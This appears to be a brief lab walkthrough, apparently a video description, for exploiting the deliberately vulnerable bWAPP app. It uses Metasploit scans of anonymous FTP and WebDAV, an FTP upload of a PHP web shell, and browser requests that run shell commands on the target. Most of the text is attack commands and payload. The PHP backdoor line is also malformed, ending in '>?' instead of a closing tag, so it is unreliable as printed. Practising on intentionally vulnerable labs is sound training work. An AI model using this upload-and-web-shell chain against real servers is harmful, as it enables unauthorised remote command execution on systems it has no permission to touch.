The video shows how to exploit bWAPP through FTP and Webdav using metasploit framework. Here are the steps:
- First run nmap and closely verify all the services
- Run Metasploit Framework and exploit webdav and enable it
- Run FTP and login and upload your backdoor
- Access your backdoor through web browser and get reverse shell
# msfconsole msf > search ftp_login msf > auxiliary/scanner/ftp/ftp_login msf auxiliary(ftp_login) > show options msf auxiliary(ftp_login) > set USERNAME anonymous msf auxiliary(ftp_login) > show options msf auxiliary(ftp_login) > set RHOSTS 192.168.25.139 msf auxiliary(ftp_login) > exploit msf auxiliary(ftp_login) > search webdav_scanner msf auxiliary(ftp_login) > use auxiliary/scanner/http/webdav_scanner msf auxiliary(webdav_scanner) > show options msf auxiliary(webdav_scanner) > set RHOSTS 192.168.25.139 msf auxiliary(webdav_scanner) > set PATH /webdav/ msf auxiliary(webdav_scanner) > exploit # ftp ftp> o (to) 192.168.25.139 Name (192.168.25.139:root): anonymous Password: ftp> ls ftp> put backdoor.php
backdoor.php code:
<?php print_r(($_GET['x'])?exec($_GET['x']):''); >?
Address Bar:
192.168.25.139/webdav/backdoor.php?x=ls
192.168.25.139/webdav/backdoor.php?x=pwd